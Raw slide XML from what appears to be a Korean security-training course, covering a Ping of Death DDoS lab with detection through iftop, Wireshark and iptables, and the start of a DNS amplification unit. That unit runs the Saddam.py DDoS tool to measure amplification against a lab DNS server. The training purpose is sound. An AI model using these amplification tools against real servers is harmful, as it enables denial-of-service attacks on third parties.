            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>3) bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>종료</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>killall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> named</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> 4) bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> named</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pP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false →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r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1">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bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>종료</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>killall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> named</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4) bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> named</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/Training/Unit/Net/13</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 13. DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Ping of Death</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Ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>패킷</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>패킷</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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/Environ/Docker</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> WSL2 Docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 아래 링크로 접속</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://hub.docker.com/editions/community/docker-ce-desktop-windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>학생 화면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 교관공격 버튼 클릭 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Setup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>관리자 화면에서 왼쪽 ‘교관 공격‘ 탭 클릭 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격하고자 하는 해당 문제번호와 할당 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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2. ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Net/13</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 13. DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Ping of Death</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과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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[setup]</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>탐지 항목</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격서버에서 희생자서버로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ping of Death </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격시도</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>iftop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>명령으로 트래픽 양 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>희생자서버에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>패킷 분석</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>패킷을 분석해보면 패킷이 너무 커서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>여러개로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 분할된 것 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>- ICMP Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>패킷 분석</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>- ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>iftop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>iftop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>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 TX : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>전송 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/ RX : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>수신 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/ TOTAL : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>전체 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>cumm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>iftop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>실행 후 현재까지의 총 데이터 양 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/ peak : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>피크시의 데이터 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/ rates : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>각각 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>초</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>초</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>초의 평균흐름 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>)</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2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>패킷이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ipv4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>패킷으로 쪼개져 들어오는 것을 확인 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>패킷에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Reassembled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>패킷의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>rsyslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>rsyslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> restart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4) /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>sysconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/iptables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일 수정</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>sysconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/iptables</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5) iptables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>수정한 값을 적용하기 위해 서비스 재시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># service iptables restart </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/Training/Unit/Net/14</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 14. DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– DNS Amplification</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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>DoS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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>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대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버 테스트</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># dig @10.10.1.101 example.com</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>※ dig : DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버에 질의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>응답에 활용하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Command-line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>툴로서 도메인 분석 등에 활용 되고 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>증폭 지수 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># python /root/Saddam.py benchmark –d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>dns.txt:example.com</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marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>배 증폭 가능함을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
